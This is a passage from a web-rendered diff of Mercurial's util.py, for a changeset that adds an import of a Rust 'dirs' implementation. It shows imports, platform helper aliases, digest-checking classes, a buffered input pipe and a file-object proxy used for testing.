##// END OF EJS Templates
rust-dirstate: call new "dirs" rust implementation from Python...
Raphaël Gomès -
r42738:f5ef8c85 default draft
parent child Browse files
Show More
@@ -1,3318 +1,3323 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import mmap
25 import mmap
26 import os
26 import os
27 import platform as pyplatform
27 import platform as pyplatform
28 import re as remod
28 import re as remod
29 import shutil
29 import shutil
30 import socket
30 import socket
31 import stat
31 import stat
32 import sys
32 import sys
33 import time
33 import time
34 import traceback
34 import traceback
35 import warnings
35 import warnings
36
36
37 from .thirdparty import (
37 from .thirdparty import (
38 attr,
38 attr,
39 )
39 )
40 from hgdemandimport import tracing
40 from hgdemandimport import tracing
41 from . import (
41 from . import (
42 encoding,
42 encoding,
43 error,
43 error,
44 i18n,
44 i18n,
45 node as nodemod,
45 node as nodemod,
46 policy,
46 policy,
47 pycompat,
47 pycompat,
48 urllibcompat,
48 urllibcompat,
49 )
49 )
50 from .utils import (
50 from .utils import (
51 compression,
51 compression,
52 procutil,
52 procutil,
53 stringutil,
53 stringutil,
54 )
54 )
55
55
56 rustdirs = policy.importrust('dirstate', 'Dirs')
57
56 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
57 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
58 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
59
61
60 b85decode = base85.b85decode
62 b85decode = base85.b85decode
61 b85encode = base85.b85encode
63 b85encode = base85.b85encode
62
64
63 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
64 httplib = pycompat.httplib
66 httplib = pycompat.httplib
65 pickle = pycompat.pickle
67 pickle = pycompat.pickle
66 safehasattr = pycompat.safehasattr
68 safehasattr = pycompat.safehasattr
67 socketserver = pycompat.socketserver
69 socketserver = pycompat.socketserver
68 bytesio = pycompat.bytesio
70 bytesio = pycompat.bytesio
69 # TODO deprecate stringio name, as it is a lie on Python 3.
71 # TODO deprecate stringio name, as it is a lie on Python 3.
70 stringio = bytesio
72 stringio = bytesio
71 xmlrpclib = pycompat.xmlrpclib
73 xmlrpclib = pycompat.xmlrpclib
72
74
73 httpserver = urllibcompat.httpserver
75 httpserver = urllibcompat.httpserver
74 urlerr = urllibcompat.urlerr
76 urlerr = urllibcompat.urlerr
75 urlreq = urllibcompat.urlreq
77 urlreq = urllibcompat.urlreq
76
78
77 # workaround for win32mbcs
79 # workaround for win32mbcs
78 _filenamebytestr = pycompat.bytestr
80 _filenamebytestr = pycompat.bytestr
79
81
80 if pycompat.iswindows:
82 if pycompat.iswindows:
81 from . import windows as platform
83 from . import windows as platform
82 else:
84 else:
83 from . import posix as platform
85 from . import posix as platform
84
86
85 _ = i18n._
87 _ = i18n._
86
88
87 bindunixsocket = platform.bindunixsocket
89 bindunixsocket = platform.bindunixsocket
88 cachestat = platform.cachestat
90 cachestat = platform.cachestat
89 checkexec = platform.checkexec
91 checkexec = platform.checkexec
90 checklink = platform.checklink
92 checklink = platform.checklink
91 copymode = platform.copymode
93 copymode = platform.copymode
92 expandglobs = platform.expandglobs
94 expandglobs = platform.expandglobs
93 getfsmountpoint = platform.getfsmountpoint
95 getfsmountpoint = platform.getfsmountpoint
94 getfstype = platform.getfstype
96 getfstype = platform.getfstype
95 groupmembers = platform.groupmembers
97 groupmembers = platform.groupmembers
96 groupname = platform.groupname
98 groupname = platform.groupname
97 isexec = platform.isexec
99 isexec = platform.isexec
98 isowner = platform.isowner
100 isowner = platform.isowner
99 listdir = osutil.listdir
101 listdir = osutil.listdir
100 localpath = platform.localpath
102 localpath = platform.localpath
101 lookupreg = platform.lookupreg
103 lookupreg = platform.lookupreg
102 makedir = platform.makedir
104 makedir = platform.makedir
103 nlinks = platform.nlinks
105 nlinks = platform.nlinks
104 normpath = platform.normpath
106 normpath = platform.normpath
105 normcase = platform.normcase
107 normcase = platform.normcase
106 normcasespec = platform.normcasespec
108 normcasespec = platform.normcasespec
107 normcasefallback = platform.normcasefallback
109 normcasefallback = platform.normcasefallback
108 openhardlinks = platform.openhardlinks
110 openhardlinks = platform.openhardlinks
109 oslink = platform.oslink
111 oslink = platform.oslink
110 parsepatchoutput = platform.parsepatchoutput
112 parsepatchoutput = platform.parsepatchoutput
111 pconvert = platform.pconvert
113 pconvert = platform.pconvert
112 poll = platform.poll
114 poll = platform.poll
113 posixfile = platform.posixfile
115 posixfile = platform.posixfile
114 readlink = platform.readlink
116 readlink = platform.readlink
115 rename = platform.rename
117 rename = platform.rename
116 removedirs = platform.removedirs
118 removedirs = platform.removedirs
117 samedevice = platform.samedevice
119 samedevice = platform.samedevice
118 samefile = platform.samefile
120 samefile = platform.samefile
119 samestat = platform.samestat
121 samestat = platform.samestat
120 setflags = platform.setflags
122 setflags = platform.setflags
121 split = platform.split
123 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
125 statisexec = platform.statisexec
124 statislink = platform.statislink
126 statislink = platform.statislink
125 umask = platform.umask
127 umask = platform.umask
126 unlink = platform.unlink
128 unlink = platform.unlink
127 username = platform.username
129 username = platform.username
128
130
129 # small compat layer
131 # small compat layer
130 compengines = compression.compengines
132 compengines = compression.compengines
131 SERVERROLE = compression.SERVERROLE
133 SERVERROLE = compression.SERVERROLE
132 CLIENTROLE = compression.CLIENTROLE
134 CLIENTROLE = compression.CLIENTROLE
133
135
134 try:
136 try:
135 recvfds = osutil.recvfds
137 recvfds = osutil.recvfds
136 except AttributeError:
138 except AttributeError:
137 pass
139 pass
138
140
139 # Python compatibility
141 # Python compatibility
140
142
141 _notset = object()
143 _notset = object()
142
144
143 def bitsfrom(container):
145 def bitsfrom(container):
144 bits = 0
146 bits = 0
145 for bit in container:
147 for bit in container:
146 bits |= bit
148 bits |= bit
147 return bits
149 return bits
148
150
149 # python 2.6 still have deprecation warning enabled by default. We do not want
151 # python 2.6 still have deprecation warning enabled by default. We do not want
150 # to display anything to standard user so detect if we are running test and
152 # to display anything to standard user so detect if we are running test and
151 # only use python deprecation warning in this case.
153 # only use python deprecation warning in this case.
152 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
153 if _dowarn:
155 if _dowarn:
154 # explicitly unfilter our warning for python 2.7
156 # explicitly unfilter our warning for python 2.7
155 #
157 #
156 # The option of setting PYTHONWARNINGS in the test runner was investigated.
158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
157 # However, module name set through PYTHONWARNINGS was exactly matched, so
159 # However, module name set through PYTHONWARNINGS was exactly matched, so
158 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
160 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
159 # makes the whole PYTHONWARNINGS thing useless for our usecase.
161 # makes the whole PYTHONWARNINGS thing useless for our usecase.
160 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
161 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
163 if _dowarn and pycompat.ispy3:
165 if _dowarn and pycompat.ispy3:
164 # silence warning emitted by passing user string to re.sub()
166 # silence warning emitted by passing user string to re.sub()
165 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
166 r'mercurial')
168 r'mercurial')
167 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
168 DeprecationWarning, r'mercurial')
170 DeprecationWarning, r'mercurial')
169 # TODO: reinvent imp.is_frozen()
171 # TODO: reinvent imp.is_frozen()
170 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
171 DeprecationWarning, r'mercurial')
173 DeprecationWarning, r'mercurial')
172
174
173 def nouideprecwarn(msg, version, stacklevel=1):
175 def nouideprecwarn(msg, version, stacklevel=1):
174 """Issue an python native deprecation warning
176 """Issue an python native deprecation warning
175
177
176 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
177 """
179 """
178 if _dowarn:
180 if _dowarn:
179 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
180 " update your code.)") % version
182 " update your code.)") % version
181 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
182
184
183 DIGESTS = {
185 DIGESTS = {
184 'md5': hashlib.md5,
186 'md5': hashlib.md5,
185 'sha1': hashlib.sha1,
187 'sha1': hashlib.sha1,
186 'sha512': hashlib.sha512,
188 'sha512': hashlib.sha512,
187 }
189 }
188 # List of digest types from strongest to weakest
190 # List of digest types from strongest to weakest
189 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
190
192
191 for k in DIGESTS_BY_STRENGTH:
193 for k in DIGESTS_BY_STRENGTH:
192 assert k in DIGESTS
194 assert k in DIGESTS
193
195
194 class digester(object):
196 class digester(object):
195 """helper to compute digests.
197 """helper to compute digests.
196
198
197 This helper can be used to compute one or more digests given their name.
199 This helper can be used to compute one or more digests given their name.
198
200
199 >>> d = digester([b'md5', b'sha1'])
201 >>> d = digester([b'md5', b'sha1'])
200 >>> d.update(b'foo')
202 >>> d.update(b'foo')
201 >>> [k for k in sorted(d)]
203 >>> [k for k in sorted(d)]
202 ['md5', 'sha1']
204 ['md5', 'sha1']
203 >>> d[b'md5']
205 >>> d[b'md5']
204 'acbd18db4cc2f85cedef654fccc4a4d8'
206 'acbd18db4cc2f85cedef654fccc4a4d8'
205 >>> d[b'sha1']
207 >>> d[b'sha1']
206 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
207 >>> digester.preferred([b'md5', b'sha1'])
209 >>> digester.preferred([b'md5', b'sha1'])
208 'sha1'
210 'sha1'
209 """
211 """
210
212
211 def __init__(self, digests, s=''):
213 def __init__(self, digests, s=''):
212 self._hashes = {}
214 self._hashes = {}
213 for k in digests:
215 for k in digests:
214 if k not in DIGESTS:
216 if k not in DIGESTS:
215 raise error.Abort(_('unknown digest type: %s') % k)
217 raise error.Abort(_('unknown digest type: %s') % k)
216 self._hashes[k] = DIGESTS[k]()
218 self._hashes[k] = DIGESTS[k]()
217 if s:
219 if s:
218 self.update(s)
220 self.update(s)
219
221
220 def update(self, data):
222 def update(self, data):
221 for h in self._hashes.values():
223 for h in self._hashes.values():
222 h.update(data)
224 h.update(data)
223
225
224 def __getitem__(self, key):
226 def __getitem__(self, key):
225 if key not in DIGESTS:
227 if key not in DIGESTS:
226 raise error.Abort(_('unknown digest type: %s') % k)
228 raise error.Abort(_('unknown digest type: %s') % k)
227 return nodemod.hex(self._hashes[key].digest())
229 return nodemod.hex(self._hashes[key].digest())
228
230
229 def __iter__(self):
231 def __iter__(self):
230 return iter(self._hashes)
232 return iter(self._hashes)
231
233
232 @staticmethod
234 @staticmethod
233 def preferred(supported):
235 def preferred(supported):
234 """returns the strongest digest type in both supported and DIGESTS."""
236 """returns the strongest digest type in both supported and DIGESTS."""
235
237
236 for k in DIGESTS_BY_STRENGTH:
238 for k in DIGESTS_BY_STRENGTH:
237 if k in supported:
239 if k in supported:
238 return k
240 return k
239 return None
241 return None
240
242
241 class digestchecker(object):
243 class digestchecker(object):
242 """file handle wrapper that additionally checks content against a given
244 """file handle wrapper that additionally checks content against a given
243 size and digests.
245 size and digests.
244
246
245 d = digestchecker(fh, size, {'md5': '...'})
247 d = digestchecker(fh, size, {'md5': '...'})
246
248
247 When multiple digests are given, all of them are validated.
249 When multiple digests are given, all of them are validated.
248 """
250 """
249
251
250 def __init__(self, fh, size, digests):
252 def __init__(self, fh, size, digests):
251 self._fh = fh
253 self._fh = fh
252 self._size = size
254 self._size = size
253 self._got = 0
255 self._got = 0
254 self._digests = dict(digests)
256 self._digests = dict(digests)
255 self._digester = digester(self._digests.keys())
257 self._digester = digester(self._digests.keys())
256
258
257 def read(self, length=-1):
259 def read(self, length=-1):
258 content = self._fh.read(length)
260 content = self._fh.read(length)
259 self._digester.update(content)
261 self._digester.update(content)
260 self._got += len(content)
262 self._got += len(content)
261 return content
263 return content
262
264
263 def validate(self):
265 def validate(self):
264 if self._size != self._got:
266 if self._size != self._got:
265 raise error.Abort(_('size mismatch: expected %d, got %d') %
267 raise error.Abort(_('size mismatch: expected %d, got %d') %
266 (self._size, self._got))
268 (self._size, self._got))
267 for k, v in self._digests.items():
269 for k, v in self._digests.items():
268 if v != self._digester[k]:
270 if v != self._digester[k]:
269 # i18n: first parameter is a digest name
271 # i18n: first parameter is a digest name
270 raise error.Abort(_('%s mismatch: expected %s, got %s') %
272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
271 (k, v, self._digester[k]))
273 (k, v, self._digester[k]))
272
274
273 try:
275 try:
274 buffer = buffer
276 buffer = buffer
275 except NameError:
277 except NameError:
276 def buffer(sliceable, offset=0, length=None):
278 def buffer(sliceable, offset=0, length=None):
277 if length is not None:
279 if length is not None:
278 return memoryview(sliceable)[offset:offset + length]
280 return memoryview(sliceable)[offset:offset + length]
279 return memoryview(sliceable)[offset:]
281 return memoryview(sliceable)[offset:]
280
282
281 _chunksize = 4096
283 _chunksize = 4096
282
284
283 class bufferedinputpipe(object):
285 class bufferedinputpipe(object):
284 """a manually buffered input pipe
286 """a manually buffered input pipe
285
287
286 Python will not let us use buffered IO and lazy reading with 'polling' at
288 Python will not let us use buffered IO and lazy reading with 'polling' at
287 the same time. We cannot probe the buffer state and select will not detect
289 the same time. We cannot probe the buffer state and select will not detect
288 that data are ready to read if they are already buffered.
290 that data are ready to read if they are already buffered.
289
291
290 This class let us work around that by implementing its own buffering
292 This class let us work around that by implementing its own buffering
291 (allowing efficient readline) while offering a way to know if the buffer is
293 (allowing efficient readline) while offering a way to know if the buffer is
292 empty from the output (allowing collaboration of the buffer with polling).
294 empty from the output (allowing collaboration of the buffer with polling).
293
295
294 This class lives in the 'util' module because it makes use of the 'os'
296 This class lives in the 'util' module because it makes use of the 'os'
295 module from the python stdlib.
297 module from the python stdlib.
296 """
298 """
297 def __new__(cls, fh):
299 def __new__(cls, fh):
298 # If we receive a fileobjectproxy, we need to use a variation of this
300 # If we receive a fileobjectproxy, we need to use a variation of this
299 # class that notifies observers about activity.
301 # class that notifies observers about activity.
300 if isinstance(fh, fileobjectproxy):
302 if isinstance(fh, fileobjectproxy):
301 cls = observedbufferedinputpipe
303 cls = observedbufferedinputpipe
302
304
303 return super(bufferedinputpipe, cls).__new__(cls)
305 return super(bufferedinputpipe, cls).__new__(cls)
304
306
305 def __init__(self, input):
307 def __init__(self, input):
306 self._input = input
308 self._input = input
307 self._buffer = []
309 self._buffer = []
308 self._eof = False
310 self._eof = False
309 self._lenbuf = 0
311 self._lenbuf = 0
310
312
311 @property
313 @property
312 def hasbuffer(self):
314 def hasbuffer(self):
313 """True is any data is currently buffered
315 """True is any data is currently buffered
314
316
315 This will be used externally a pre-step for polling IO. If there is
317 This will be used externally a pre-step for polling IO. If there is
316 already data then no polling should be set in place."""
318 already data then no polling should be set in place."""
317 return bool(self._buffer)
319 return bool(self._buffer)
318
320
319 @property
321 @property
320 def closed(self):
322 def closed(self):
321 return self._input.closed
323 return self._input.closed
322
324
323 def fileno(self):
325 def fileno(self):
324 return self._input.fileno()
326 return self._input.fileno()
325
327
326 def close(self):
328 def close(self):
327 return self._input.close()
329 return self._input.close()
328
330
329 def read(self, size):
331 def read(self, size):
330 while (not self._eof) and (self._lenbuf < size):
332 while (not self._eof) and (self._lenbuf < size):
331 self._fillbuffer()
333 self._fillbuffer()
332 return self._frombuffer(size)
334 return self._frombuffer(size)
333
335
334 def unbufferedread(self, size):
336 def unbufferedread(self, size):
335 if not self._eof and self._lenbuf == 0:
337 if not self._eof and self._lenbuf == 0:
336 self._fillbuffer(max(size, _chunksize))
338 self._fillbuffer(max(size, _chunksize))
337 return self._frombuffer(min(self._lenbuf, size))
339 return self._frombuffer(min(self._lenbuf, size))
338
340
339 def readline(self, *args, **kwargs):
341 def readline(self, *args, **kwargs):
340 if len(self._buffer) > 1:
342 if len(self._buffer) > 1:
341 # this should not happen because both read and readline end with a
343 # this should not happen because both read and readline end with a
342 # _frombuffer call that collapse it.
344 # _frombuffer call that collapse it.
343 self._buffer = [''.join(self._buffer)]
345 self._buffer = [''.join(self._buffer)]
344 self._lenbuf = len(self._buffer[0])
346 self._lenbuf = len(self._buffer[0])
345 lfi = -1
347 lfi = -1
346 if self._buffer:
348 if self._buffer:
347 lfi = self._buffer[-1].find('\n')
349 lfi = self._buffer[-1].find('\n')
348 while (not self._eof) and lfi < 0:
350 while (not self._eof) and lfi < 0:
349 self._fillbuffer()
351 self._fillbuffer()
350 if self._buffer:
352 if self._buffer:
351 lfi = self._buffer[-1].find('\n')
353 lfi = self._buffer[-1].find('\n')
352 size = lfi + 1
354 size = lfi + 1
353 if lfi < 0: # end of file
355 if lfi < 0: # end of file
354 size = self._lenbuf
356 size = self._lenbuf
355 elif len(self._buffer) > 1:
357 elif len(self._buffer) > 1:
356 # we need to take previous chunks into account
358 # we need to take previous chunks into account
357 size += self._lenbuf - len(self._buffer[-1])
359 size += self._lenbuf - len(self._buffer[-1])
358 return self._frombuffer(size)
360 return self._frombuffer(size)
359
361
360 def _frombuffer(self, size):
362 def _frombuffer(self, size):
361 """return at most 'size' data from the buffer
363 """return at most 'size' data from the buffer
362
364
363 The data are removed from the buffer."""
365 The data are removed from the buffer."""
364 if size == 0 or not self._buffer:
366 if size == 0 or not self._buffer:
365 return ''
367 return ''
366 buf = self._buffer[0]
368 buf = self._buffer[0]
367 if len(self._buffer) > 1:
369 if len(self._buffer) > 1:
368 buf = ''.join(self._buffer)
370 buf = ''.join(self._buffer)
369
371
370 data = buf[:size]
372 data = buf[:size]
371 buf = buf[len(data):]
373 buf = buf[len(data):]
372 if buf:
374 if buf:
373 self._buffer = [buf]
375 self._buffer = [buf]
374 self._lenbuf = len(buf)
376 self._lenbuf = len(buf)
375 else:
377 else:
376 self._buffer = []
378 self._buffer = []
377 self._lenbuf = 0
379 self._lenbuf = 0
378 return data
380 return data
379
381
380 def _fillbuffer(self, size=_chunksize):
382 def _fillbuffer(self, size=_chunksize):
381 """read data to the buffer"""
383 """read data to the buffer"""
382 data = os.read(self._input.fileno(), size)
384 data = os.read(self._input.fileno(), size)
383 if not data:
385 if not data:
384 self._eof = True
386 self._eof = True
385 else:
387 else:
386 self._lenbuf += len(data)
388 self._lenbuf += len(data)
387 self._buffer.append(data)
389 self._buffer.append(data)
388
390
389 return data
391 return data
390
392
391 def mmapread(fp):
393 def mmapread(fp):
392 try:
394 try:
393 fd = getattr(fp, 'fileno', lambda: fp)()
395 fd = getattr(fp, 'fileno', lambda: fp)()
394 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
395 except ValueError:
397 except ValueError:
396 # Empty files cannot be mmapped, but mmapread should still work. Check
398 # Empty files cannot be mmapped, but mmapread should still work. Check
397 # if the file is empty, and if so, return an empty buffer.
399 # if the file is empty, and if so, return an empty buffer.
398 if os.fstat(fd).st_size == 0:
400 if os.fstat(fd).st_size == 0:
399 return ''
401 return ''
400 raise
402 raise
401
403
402 class fileobjectproxy(object):
404 class fileobjectproxy(object):
403 """A proxy around file objects that tells a watcher when events occur.
405 """A proxy around file objects that tells a watcher when events occur.
404
406
405 This type is intended to only be used for testing purposes. Think hard
407 This type is intended to only be used for testing purposes. Think hard
406 before using it in important code.
408 before using it in important code.
407 """
409 """
408 __slots__ = (
410 __slots__ = (
409 r'_orig',
411 r'_orig',
410 r'_observer',
412 r'_observer',
411 )
413 )
412
414
413 def __init__(self, fh, observer):
415 def __init__(self, fh, observer):
414 object.__setattr__(self, r'_orig', fh)
416 object.__setattr__(self, r'_orig', fh)
415 object.__setattr__(self, r'_observer', observer)
417 object.__setattr__(self, r'_observer', observer)
416
418
417 def __getattribute__(self, name):
419 def __getattribute__(self, name):
418 ours = {
420 ours = {
419 r'_observer',
421 r'_observer',
420
422
421 # IOBase
423 # IOBase
422 r'close',
424 r'close',
423 # closed if a property
425 # closed if a property
424 r'fileno',
426 r'fileno',
425 r'flush',
427 r'flush',
426 r'isatty',
428 r'isatty',
427 r'readable',
429 r'readable',
428 r'readline',
430 r'readline',
429 r'readlines',
431 r'readlines',
430 r'seek',
432 r'seek',
431 r'seekable',
433 r'seekable',
432 r'tell',
434 r'tell',
433 r'truncate',
435 r'truncate',
434 r'writable',
436 r'writable',
435 r'writelines',
437 r'writelines',
436 # RawIOBase
438 # RawIOBase
437 r'read',
439 r'read',
438 r'readall',
440 r'readall',
439 r'readinto',
441 r'readinto',
440 r'write',
442 r'write',
441 # BufferedIOBase
443 # BufferedIOBase
442 # raw is a property
444 # raw is a property
443 r'detach',
445 r'detach',
444 # read defined above
446 # read defined above
445 r'read1',
447 r'read1',
446 # readinto defined above
448 # readinto defined above
447 # write defined above
449 # write defined above
448 }
450 }
449
451
450 # We only observe some methods.
452 # We only observe some methods.
451 if name in ours:
453 if name in ours:
452 return object.__getattribute__(self, name)
454 return object.__getattribute__(self, name)
453
455
454 return getattr(object.__getattribute__(self, r'_orig'), name)
456 return getattr(object.__getattribute__(self, r'_orig'), name)
455
457
456 def __nonzero__(self):
458 def __nonzero__(self):
457 return bool(object.__getattribute__(self, r'_orig'))
459 return bool(object.__getattribute__(self, r'_orig'))
458
460
459 __bool__ = __nonzero__
461 __bool__ = __nonzero__
460
462
461 def __delattr__(self, name):
463 def __delattr__(self, name):
462 return delattr(object.__getattribute__(self, r'_orig'), name)
464 return delattr(object.__getattribute__(self, r'_orig'), name)
463
465
464 def __setattr__(self, name, value):
466 def __setattr__(self, name, value):
465 return setattr(object.__getattribute__(self, r'_orig'), name, value)
467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
466
468
467 def __iter__(self):
469 def __iter__(self):
468 return object.__getattribute__(self, r'_orig').__iter__()
470 return object.__getattribute__(self, r'_orig').__iter__()
469
471
470 def _observedcall(self, name, *args, **kwargs):
472 def _observedcall(self, name, *args, **kwargs):
471 # Call the original object.
473 # Call the original object.
472 orig = object.__getattribute__(self, r'_orig')
474 orig = object.__getattribute__(self, r'_orig')
473 res = getattr(orig, name)(*args, **kwargs)
475 res = getattr(orig, name)(*args, **kwargs)
474
476
475 # Call a method on the observer of the same name with arguments
477 # Call a method on the observer of the same name with arguments
476 # so it can react, log, etc.
478 # so it can react, log, etc.
477 observer = object.__getattribute__(self, r'_observer')
479 observer = object.__getattribute__(self, r'_observer')
478 fn = getattr(observer, name, None)
480 fn = getattr(observer, name, None)
479 if fn:
481 if fn:
480 fn(res, *args, **kwargs)
482 fn(res, *args, **kwargs)
481
483
482 return res
484 return res
483
485
484 def close(self, *args, **kwargs):
486 def close(self, *args, **kwargs):
485 return object.__getattribute__(self, r'_observedcall')(
487 return object.__getattribute__(self, r'_observedcall')(
486 r'close', *args, **kwargs)
488 r'close', *args, **kwargs)
487
489
488 def fileno(self, *args, **kwargs):
490 def fileno(self, *args, **kwargs):
489 return object.__getattribute__(self, r'_observedcall')(
491 return object.__getattribute__(self, r'_observedcall')(
490 r'fileno', *args, **kwargs)
492 r'fileno', *args, **kwargs)
491
493
492 def flush(self, *args, **kwargs):
494 def flush(self, *args, **kwargs):
493 return object.__getattribute__(self, r'_observedcall')(
495 return object.__getattribute__(self, r'_observedcall')(
494 r'flush', *args, **kwargs)
496 r'flush', *args, **kwargs)
495
497
496 def isatty(self, *args, **kwargs):
498 def isatty(self, *args, **kwargs):
497 return object.__getattribute__(self, r'_observedcall')(
499 return object.__getattribute__(self, r'_observedcall')(
498 r'isatty', *args, **kwargs)
500 r'isatty', *args, **kwargs)
499
501
500 def readable(self, *args, **kwargs):
502 def readable(self, *args, **kwargs):
501 return object.__getattribute__(self, r'_observedcall')(
503 return object.__getattribute__(self, r'_observedcall')(
502 r'readable', *args, **kwargs)
504 r'readable', *args, **kwargs)
503
505
504 def readline(self, *args, **kwargs):
506 def readline(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
507 return object.__getattribute__(self, r'_observedcall')(
506 r'readline', *args, **kwargs)
508 r'readline', *args, **kwargs)
507
509
508 def readlines(self, *args, **kwargs):
510 def readlines(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
511 return object.__getattribute__(self, r'_observedcall')(
510 r'readlines', *args, **kwargs)
512 r'readlines', *args, **kwargs)
511
513
512 def seek(self, *args, **kwargs):
514 def seek(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
515 return object.__getattribute__(self, r'_observedcall')(
514 r'seek', *args, **kwargs)
516 r'seek', *args, **kwargs)
515
517
516 def seekable(self, *args, **kwargs):
518 def seekable(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
519 return object.__getattribute__(self, r'_observedcall')(
518 r'seekable', *args, **kwargs)
520 r'seekable', *args, **kwargs)
519
521
520 def tell(self, *args, **kwargs):
522 def tell(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
523 return object.__getattribute__(self, r'_observedcall')(
522 r'tell', *args, **kwargs)
524 r'tell', *args, **kwargs)
523
525
524 def truncate(self, *args, **kwargs):
526 def truncate(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
527 return object.__getattribute__(self, r'_observedcall')(
526 r'truncate', *args, **kwargs)
528 r'truncate', *args, **kwargs)
527
529
528 def writable(self, *args, **kwargs):
530 def writable(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
531 return object.__getattribute__(self, r'_observedcall')(
530 r'writable', *args, **kwargs)
532 r'writable', *args, **kwargs)
531
533
532 def writelines(self, *args, **kwargs):
534 def writelines(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
535 return object.__getattribute__(self, r'_observedcall')(
534 r'writelines', *args, **kwargs)
536 r'writelines', *args, **kwargs)
535
537
536 def read(self, *args, **kwargs):
538 def read(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
539 return object.__getattribute__(self, r'_observedcall')(
538 r'read', *args, **kwargs)
540 r'read', *args, **kwargs)
539
541
540 def readall(self, *args, **kwargs):
542 def readall(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
543 return object.__getattribute__(self, r'_observedcall')(
542 r'readall', *args, **kwargs)
544 r'readall', *args, **kwargs)
543
545
544 def readinto(self, *args, **kwargs):
546 def readinto(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
547 return object.__getattribute__(self, r'_observedcall')(
546 r'readinto', *args, **kwargs)
548 r'readinto', *args, **kwargs)
547
549
548 def write(self, *args, **kwargs):
550 def write(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
551 return object.__getattribute__(self, r'_observedcall')(
550 r'write', *args, **kwargs)
552 r'write', *args, **kwargs)
551
553
552 def detach(self, *args, **kwargs):
554 def detach(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
555 return object.__getattribute__(self, r'_observedcall')(
554 r'detach', *args, **kwargs)
556 r'detach', *args, **kwargs)
555
557
556 def read1(self, *args, **kwargs):
558 def read1(self, *args, **kwargs):
557 return object.__getattribute__(self, r'_observedcall')(
559 return object.__getattribute__(self, r'_observedcall')(
558 r'read1', *args, **kwargs)
560 r'read1', *args, **kwargs)
559
561
560 class observedbufferedinputpipe(bufferedinputpipe):
562 class observedbufferedinputpipe(bufferedinputpipe):
561 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
562
564
563 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
564 bypass ``fileobjectproxy``. Because of this, we need to make
566 bypass ``fileobjectproxy``. Because of this, we need to make
